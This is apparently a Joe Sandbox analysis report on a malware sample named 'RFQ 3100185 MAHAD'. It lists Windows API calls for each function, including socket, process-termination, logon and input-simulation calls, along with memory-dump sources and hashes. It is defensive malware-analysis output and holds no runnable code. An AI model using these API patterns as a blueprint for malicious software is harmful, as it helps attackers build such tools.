                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 3451389628-0
                                                            • Opcode ID: 97cf12abf5fc113552272dad4f18c225dde395c03b7ce32fb3f4cdc146d6199b
                                                            • Instruction ID: 15f3cd6453f9587a5635bead736e650a54ea65ad78d0c7d6a3315f9c8a9de419
                                                            • Opcode Fuzzy Hash: 97cf12abf5fc113552272dad4f18c225dde395c03b7ce32fb3f4cdc146d6199b
                                                            • Instruction Fuzzy Hash: 19514531208304EFC705EF64C899EAABBE9FF88304F04895DF595872A1DB35EA45CB52
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00818540
                                                            • GetMenuItemCount.USER32(00000000), ref: 00818577
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0081859F
                                                            • GetMenuItemID.USER32(?,?), ref: 0081860E
                                                            • GetSubMenu.USER32(?,?), ref: 0081861C
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0081866D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 4f5d234aa311c79cd4911d19a9c279cd0ee92f8770e02c767a8a9c6b71617b24
                                                            • Instruction ID: 32b286db01eaf0a8cd518b8591ec3800f8efbea70ec56ed585eb1ce80ce1d481
                                                            • Opcode Fuzzy Hash: 4f5d234aa311c79cd4911d19a9c279cd0ee92f8770e02c767a8a9c6b71617b24
                                                            • Instruction Fuzzy Hash: 48517831A00218EFCB11EF64C84AAEEB7F9FF58310F104499E915EB351DB34AE818B90
                                                            APIs
                                                            • _memset.LIBCMT ref: 007F4B10
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4B5B
                                                            • IsMenu.USER32(00000000), ref: 007F4B7B
                                                            • CreatePopupMenu.USER32 ref: 007F4BAF
                                                            • GetMenuItemCount.USER32(000000FF), ref: 007F4C0D
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007F4C3E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: efa4d90981663a61f75330bb228ab46af23a4ee813af2dfaad0f3da93ab5795b
                                                            • Instruction ID: 0e33531f7a84e0bf52e0ef8595f5310fe26cd806d73b6621e0f7fa96a1be596b
                                                            • Opcode Fuzzy Hash: efa4d90981663a61f75330bb228ab46af23a4ee813af2dfaad0f3da93ab5795b
                                                            • Instruction Fuzzy Hash: AA51ADB060130DEBDF20CF68D988BBEBBF4AF44318F144159E6659A391E7789944CB61
                                                            APIs
                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0084DC00), ref: 00808E7C
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00808E89
                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00808EAD
                                                            • #16.WSOCK32(?,?,00000000,00000000), ref: 00808EC5
                                                            • _strlen.LIBCMT ref: 00808EF7
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00808F6A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_strlenselect
                                                            • String ID:
                                                            • API String ID: 2217125717-0
                                                            • Opcode ID: eed0109317b7a2279af2816079303197bcc50912baebc44b051d7d566024aa08
                                                            • Instruction ID: 7668582b6fa48a52ec19bf55f7885e992eaf1fbb1ef75bd81a5c604b5d7567e5
                                                            • Opcode Fuzzy Hash: eed0109317b7a2279af2816079303197bcc50912baebc44b051d7d566024aa08
                                                            • Instruction Fuzzy Hash: F4417C71500208EBCB54EBA4CD8AEEEB7B9FB48314F104559F556D72D1DF34AE40CA60
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • BeginPaint.USER32(?,?,?), ref: 007CAC2A
                                                            • GetWindowRect.USER32(?,?), ref: 007CAC8E
                                                            • ScreenToClient.USER32(?,?), ref: 007CACAB
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007CACBC
                                                            • EndPaint.USER32(?,?,?,?,?), ref: 007CAD06
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0082E673
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 2592858361-0
                                                            • Opcode ID: ca799ef5dc676bd8b2088d0299fd79e102ac1f4baaa5d8a66f473cdd6e9b9be2
                                                            • Instruction ID: 0b56bdb9b88590a44eb01fcbce7e320c97079280b4e6e71b638de0bc5473a8c8
                                                            • Opcode Fuzzy Hash: ca799ef5dc676bd8b2088d0299fd79e102ac1f4baaa5d8a66f473cdd6e9b9be2
                                                            • Instruction Fuzzy Hash: B541C370104305AFCB20DF28DC89FB67BA8FB65725F04066DF9A9C72A1D7359884DB62
                                                            APIs
                                                            • ShowWindow.USER32(00871628,00000000,00871628,00000000,00000000,00871628,?,0082DC5D,00000000,?,00000000,00000000,00000000,?,0082DAD1,00000004), ref: 0081E40B
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0081E42F
                                                            • ShowWindow.USER32(00871628,00000000), ref: 0081E48F
                                                            • ShowWindow.USER32(00000000,00000004), ref: 0081E4A1
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0081E4C5
                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0081E4E8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: eab27c1d974287bd3ff8633907572878f2615bc9265a6f7820de1c62556f9247
                                                            • Instruction ID: 56c059510f481a4d53d868cbda5bc15aba0c3a59d519f1a3f4ad21967ee20936
                                                            • Opcode Fuzzy Hash: eab27c1d974287bd3ff8633907572878f2615bc9265a6f7820de1c62556f9247
                                                            • Instruction Fuzzy Hash: 18415E34601950EFDB22CF28D499BD47BE5FF09304F1885A9EE59CF2A2C731A881DB95
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 007F98D1
                                                              • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                              • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007F9908
                                                            • EnterCriticalSection.KERNEL32(?), ref: 007F9924
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 007F999E
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007F99B3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F99D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 2537439066-0
                                                            • Opcode ID: a6e8d324d74fb268cf2677c72a8523ebdd9f465a4a0788902f5ee692ae3c506c
                                                            • Instruction ID: d0fecb0956c5607d8b6d0f6dc855024663d31b7e3571e3ca3596ac866c4e83fd
                                                            • Opcode Fuzzy Hash: a6e8d324d74fb268cf2677c72a8523ebdd9f465a4a0788902f5ee692ae3c506c
                                                            • Instruction Fuzzy Hash: 4A318431A00205EBDB10DF94DC89EAFB779FF85710B1580A9FA04AB246D774EE14DBA0
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,008077F4,?,?,00000000,00000001), ref: 00809B53
                                                              • Part of subcall function 00806544: GetWindowRect.USER32(?,?), ref: 00806557
                                                            • GetDesktopWindow.USER32 ref: 00809B7D
                                                            • GetWindowRect.USER32(00000000), ref: 00809B84
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00809BB6
                                                              • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                            • GetCursorPos.USER32(?), ref: 00809BE2
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00809C44
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: e1cf9aaa7b155b058d67ff1df7198aeedb4dd3328f92202a6ab8263eaebca4a7
                                                            • Instruction ID: de46ac5c6ff9b286ccfd91910ab6e62b056020cad9998c2a8b9cfc589fce5dff
                                                            • Opcode Fuzzy Hash: e1cf9aaa7b155b058d67ff1df7198aeedb4dd3328f92202a6ab8263eaebca4a7
                                                            • Instruction Fuzzy Hash: 1531CF72604319ABC710DF18DC49F9AB7EDFF89324F00091AF595D7282EA31EA14CB92
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007EAFAE
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 007EAFB5
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007EAFC4
                                                            • CloseHandle.KERNEL32(00000004), ref: 007EAFCF
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EAFFE
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 007EB012
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 3fd6bc5892d20a6ef8050c82f8a1b46fb3ee587425a79991d396681d16f37a0e
                                                            • Instruction ID: 6bb298e7446f1129fb240fc2620ce3d34b12fd86211afbb31d175eb142754aa5
                                                            • Opcode Fuzzy Hash: 3fd6bc5892d20a6ef8050c82f8a1b46fb3ee587425a79991d396681d16f37a0e
                                                            • Instruction Fuzzy Hash: 20217C72101249BBCF028FA9ED09FAE7BA9BF48304F144015FA01A2161D37AED21EB61
                                                            APIs
                                                              • Part of subcall function 007CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                              • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                              • Part of subcall function 007CAF83: BeginPath.GDI32(?), ref: 007CB009
                                                              • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CB033
                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0081EC20
                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0081EC34
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0081EC42
                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0081EC52
                                                            • EndPath.GDI32(00000000), ref: 0081EC62
                                                            • StrokePath.GDI32(00000000), ref: 0081EC72
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: 3d98187fc0c39b2b6a09a4e09cc28688f281418f4ca94d1dd9f5e0d2316e0982
                                                            • Instruction ID: bfe4029ade56cb3a814dfd5ba91d23975185dbe4a93823301213578a4cd8de7c
                                                            • Opcode Fuzzy Hash: 3d98187fc0c39b2b6a09a4e09cc28688f281418f4ca94d1dd9f5e0d2316e0982
                                                            • Instruction Fuzzy Hash: EB11FA72000149BFDF019FA4EC88EDA7F6DFB08354F048526BE0895160D7719D959BA0
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 007EE1C0
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 007EE1D1
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007EE1D8
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 007EE1E0
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007EE1F7
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 007EE209
                                                              • Part of subcall function 007E9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,007E9A05,00000000,00000000,?,007E9DDB), ref: 007EA53A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                                            • String ID:
                                                            • API String ID: 603618608-0
                                                            • Opcode ID: f76ded47c94eb580cbc74167192c8a6604398c5eb9075422e159a37213b5dab0
                                                            • Instruction ID: 94087c7dc96fa14fb3a5bdaa43f66c263cca55f9a7cdcfecfc5a29e4f7c592ee
                                                            • Opcode Fuzzy Hash: f76ded47c94eb580cbc74167192c8a6604398c5eb9075422e159a37213b5dab0
                                                            • Instruction Fuzzy Hash: C90184B5A00758BFEB109BA69C45B5EBFB8EB88751F004466FE04A7290D6709C00CBA0
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 007D7B47
                                                              • Part of subcall function 007D123A: __initp_misc_winsig.LIBCMT ref: 007D125E
                                                              • Part of subcall function 007D123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007D7F51
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007D7F65
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007D7F78
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007D7F8B
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007D7F9E
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007D7FB1
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007D7FC4
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007D7FD7
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007D7FEA
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007D7FFD
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007D8010
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007D8023
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007D8036
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007D8049
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007D805C
                                                              • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 007D806F
                                                            • __mtinitlocks.LIBCMT ref: 007D7B4C
                                                              • Part of subcall function 007D7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0086AC68,00000FA0,?,?,007D7B51,007D5E77,00866C70,00000014), ref: 007D7E41
                                                            • __mtterm.LIBCMT ref: 007D7B55
                                                              • Part of subcall function 007D7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007D7B5A,007D5E77,00866C70,00000014), ref: 007D7D3F
                                                              • Part of subcall function 007D7BBD: _free.LIBCMT ref: 007D7D46
                                                              • Part of subcall function 007D7BBD: DeleteCriticalSection.KERNEL32(0086AC68,?,?,007D7B5A,007D5E77,00866C70,00000014), ref: 007D7D68
                                                            • __calloc_crt.LIBCMT ref: 007D7B7A
                                                            • GetCurrentThreadId.KERNEL32 ref: 007D7BA3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 2942034483-0
                                                            • Opcode ID: 0a66673b31c088eecbad44102e94ee6e16734b6118da2d165a35b87085aa4111
                                                            • Instruction ID: 15e6f540a46ca7a395b51e27b2ce138dfa8d7b04ddddf89c18a4894b3f3672fd
                                                            • Opcode Fuzzy Hash: 0a66673b31c088eecbad44102e94ee6e16734b6118da2d165a35b87085aa4111
                                                            • Instruction Fuzzy Hash: 34F096B210D31299E62C77347D0B64A2BB5AF01730B6046ABF860D53D2FF2D9841C564
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007B281D
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 007B2825
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007B2830
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007B283B
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 007B2843
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 007B284B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 29f77901d21eb4bf55cdb89eae537bc676fd77f7d207e0708de2dd8eb3233b68
                                                            • Instruction ID: ff10aefda7d741d91187bfcc1faa72ee99ea8e944fc7742342526f8e78b4e65a
                                                            • Opcode Fuzzy Hash: 29f77901d21eb4bf55cdb89eae537bc676fd77f7d207e0708de2dd8eb3233b68
                                                            • Instruction Fuzzy Hash: F10167B0902B5ABDE3009F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 1423608774-0
                                                            • Opcode ID: d2283813dc5b59196fe3ca7fea214529dd0f1303764a7dd9e24c7b5c03c177e6
                                                            • Instruction ID: 9ccad3d96ff4c25eae7376d0a6f20a8ebd28cc3d0cbd53b7c7cd734baafe0973
                                                            • Opcode Fuzzy Hash: d2283813dc5b59196fe3ca7fea214529dd0f1303764a7dd9e24c7b5c03c177e6
                                                            • Instruction Fuzzy Hash: B0018632101316ABD7151B54FC48EFB776AFFC87017044829F70392190DB68A810DB51
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007F7C07
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007F7C1D
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 007F7C2C
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C3B
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007F7C45
